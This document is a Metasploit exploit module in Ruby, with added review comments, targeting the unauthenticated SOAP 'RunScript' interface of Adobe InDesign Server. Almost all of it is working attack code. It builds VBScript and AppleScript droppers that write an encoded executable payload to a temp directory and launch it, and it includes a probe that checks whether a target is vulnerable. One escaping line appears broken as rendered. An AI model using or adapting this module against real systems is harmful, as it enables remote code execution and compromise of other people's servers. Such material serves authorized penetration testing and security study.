Path: blob/master/modules/exploits/multi/misc/indesign_server_soap.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for the Adobe InDesign Server SOAP "RunScript" operation.
# The server's script interface executes whatever script text it receives
# (VBScript on Windows, AppleScript on OS X); both paths below write an
# executable payload to disk and leave it there, which is why #exploit prints
# the artifact path for manual removal.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE

  # Module metadata. Two 64-bit targets (Windows and Mac OS X) are chosen by
  # target name in #exploit; the only option registered here is RPORT, which
  # defaults to 12345.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Adobe IndesignServer 5.5 SOAP Server Arbitrary Script Execution',
        'Description' => %q{
This module abuses the "RunScript" procedure provided by the SOAP interface of
Adobe InDesign Server, to execute arbitrary vbscript (Windows) or applescript (OSX).

The exploit drops the payload on the server and must be removed manually.
        },
        'Author' => [
          'h0ng10', # Vulnerability discovery / Metasploit module
          'juan vazquez' # MacOSX target
        ],
        'License' => MSF_LICENSE,
        'Platform' => %w{osx win},
        'Privileged' => false,
        'DisclosureDate' => '2012-11-11',
        'References' => [
          [ 'OSVDB', '87548'],
          [ 'URL', 'http://web.archive.org/web/20130119134644/http://secunia.com/advisories/48572/' ]
        ],
        'Targets' => [
          [
            'Indesign CS6 Server / Windows (64 bits)',
            {
              'Arch' => ARCH_X64,
              'Platform' => 'win'
            }
          ],
          [
            'Indesign CS6 Server / Mac OS X Snow Leopard 64 bits',
            {
              'Arch' => ARCH_X64,
              'Platform' => 'osx'
            }
          ]
        ],
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options([ Opt::RPORT(12345) ])
  end

  # Wraps +script_code+ in an IDSP:RunScript SOAP envelope and POSTs it to "/".
  #
  # @param script_code [String] script body; it is modified in place by gsub!
  #   and then interpolated verbatim into the <IDSP:scriptText> element
  # @param script_type [String] value for <IDSP:scriptLanguage>; callers pass
  #   "javascript", "visual basic" or "applescript"
  # @return whatever send_request_cgi returns (the callers guard against nil,
  #   i.e. no response, so treat nil as a possible result)
  def send_soap_request(script_code, script_type)
    # NOTE(review): as shown here this replaces '&' with '&', i.e. a no-op.
    # It reads like an XML-entity escape whose entity was unescaped when the
    # page was rendered; confirm against the repository source, since the
    # script text is interpolated into the XML body without any other escaping.
    script_code.gsub!(/&/, '&')
    soap_xml = %Q{
<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:IDSP="http://ns.adobe.com/InDesign/soap/">
<SOAP-ENV:Body>
<IDSP:RunScript>
<IDSP:runScriptParameters>
<IDSP:scriptText>#{script_code}</IDSP:scriptText>
<IDSP:scriptLanguage>#{script_type}</IDSP:scriptLanguage>
</IDSP:runScriptParameters>
</IDSP:RunScript>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
}

    # Content-type is form-urlencoded even though the body is XML; the second
    # argument (5) is the request timeout passed to send_request_cgi.
    res = send_request_cgi({
      'uri' => '/',
      'method' => 'POST',
      'content-type' => 'application/x-www-form-urlencoded',
      'data' => soap_xml,
    }, 5)
  end

  # Probes the RunScript endpoint with a harmless JavaScript assignment and
  # looks for the random marker echoed back inside the response's <data>
  # element.
  #
  # @return [Exploit::CheckCode] Vulnerable when the marker is echoed back,
  #   Safe otherwise
  #
  # NOTE(review): unlike #exploit, this dereferences res.body without a nil
  # check, so a timed-out or absent response raises NoMethodError here rather
  # than producing a CheckCode.
  def check()
    # Use a very simple javascript
    check_var = rand_text_numeric(10)
    checkscript = 'returnValue = "' + check_var + '"'

    res = send_soap_request(checkscript, "javascript")

    return Exploit::CheckCode::Vulnerable if res.body.include?('<data xsi:type="xsd:string">' + check_var + '</data>')

    return Exploit::CheckCode::Safe
  end

  # Builds a platform-specific dropper script, chosen by the target name, and
  # submits it through #send_soap_request. Neither branch removes the dropped
  # executable; the artifact path is printed as a warning for manual cleanup.
  def exploit
    if target.name =~ /Windows/
      print_status("Creating payload vbs script")
      # The executable is hex-encoded so it fits inside a VBScript string literal.
      encoded_payload = generate_payload_exe().unpack("H*").join
      # On-disk artifact: <8 random uppercase letters>.exe inside the FileSystemObject
      # temporary folder (GetSpecialFolder(2)); all other names are random identifiers.
      exe_file = Rex::Text.rand_text_alpha_upper(8) + ".exe"
      wsf = Rex::Text.rand_text_alpha(8)
      payload_var = Rex::Text.rand_text_alpha(8)
      exe_name_var = Rex::Text.rand_text_alpha(8)
      file_var = Rex::Text.rand_text_alpha(8)
      byte_var = Rex::Text.rand_text_alpha(8)
      shell_var = Rex::Text.rand_text_alpha(8)

      # This one creates a smaller vbs payload (without deletion)
      # The script decodes the hex string back to bytes, writes the file, then
      # launches it through Wscript.Shell.Run with window style 0 and without
      # waiting; the file path is handed back as the script's returnValue.
      vbs = %Q{
Set #{wsf} = CreateObject("Scripting.FileSystemObject")
#{payload_var} = "#{encoded_payload}"
#{exe_name_var} = #{wsf}.GetSpecialFolder(2) + "\\#{exe_file}"
Set #{file_var} = #{wsf}.opentextfile(#{exe_name_var}, 2, TRUE)
For x = 1 To Len(#{payload_var})-3 Step 2
#{byte_var} = Chr(38) & "H" & Mid(#{payload_var}, x, 2)
#{file_var}.write Chr(#{byte_var})
Next

#{file_var}.write Chr(#{byte_var})
#{file_var}.close

Set #{shell_var} = CreateObject("Wscript.Shell")
#{shell_var}.Run Chr(34) & #{exe_name_var} & Chr(34), 0, False
Set #{shell_var} = Nothing
returnValue = #{exe_name_var}
}
      # vbs = Msf::Util::EXE.to_exe_vbs(exe)
      print_status("Sending SOAP request")

      res = send_soap_request(vbs, "visual basic")
      if res != nil and res.body != nil then
        # Pulls the returnValue (the dropped file path) out of the SOAP reply.
        # Greedy .* and no fallback: when the body does not match this is nil
        # and the warning below prints an empty path (the OS X branch falls
        # back to its known /tmp path; this branch does not).
        file_to_delete = res.body.to_s.scan(/<data xsi:type="xsd:string">(.*)<\/data><\/scriptResult>/).flatten[0]
        print_warning "Payload deployed to #{file_to_delete.to_s}, please remove manually"
      end

    elsif target.name =~ /Mac OS X/

      print_status("Creating payload apple script")

      # The executable travels base64-encoded inside an AppleScript string and is
      # decoded on the host with uudecode. Random names are 5 to 9 letters long.
      exe_payload = generate_payload_exe
      b64_exe_payload = Rex::Text.encode_base64(exe_payload)
      b64_payload_name = rand_text_alpha(rand(5) + 5)
      payload_name = rand_text_alpha(rand(5) + 5)

      # On-disk artifacts: /tmp/<b64_payload_name>.txt (the base64 wrapper, which
      # the script itself removes) and /tmp/<payload_name> (the decoded executable,
      # which is left behind). The "\n" escapes are expanded by Ruby's %Q before
      # the script is sent, so the AppleScript string contains real newlines.
      apple_script = %Q{
set fp to open for access POSIX file "/tmp/#{b64_payload_name}.txt" with write permission
write "begin-base64 644 #{payload_name}\n#{b64_exe_payload}\n====\n" to fp
close access fp
do shell script "uudecode -o /tmp/#{payload_name} /tmp/#{b64_payload_name}.txt"
do shell script "rm /tmp/#{b64_payload_name}.txt"
do shell script "chmod +x /tmp/#{payload_name}"
do shell script "/tmp/#{payload_name}"
set returnValue to "/tmp/#{payload_name}"
}

      print_status("Sending SOAP request")

      res = send_soap_request(apple_script, "applescript")

      if res != nil and res.body != nil then
        # Same returnValue extraction as the Windows branch, but with a fallback
        # to the path chosen above when the reply does not contain it.
        file_to_delete = res.body.to_s.scan(/<data xsi:type="xsd:string">(.*)<\/data><\/scriptResult>/).flatten[0]
        file_to_delete = "/tmp/#{payload_name}" if file_to_delete.nil? or file_to_delete.empty?
        print_warning "Payload deployed to #{file_to_delete.to_s}, please remove manually"
      elsif not res
        # A nil response is treated as normal here rather than as a failure;
        # the artifact path is still reported from the locally chosen name.
        print_status "No response, it's expected"
        print_warning "Payload deployed to /tmp/#{payload_name}, please remove manually"
      end

    end
  end
end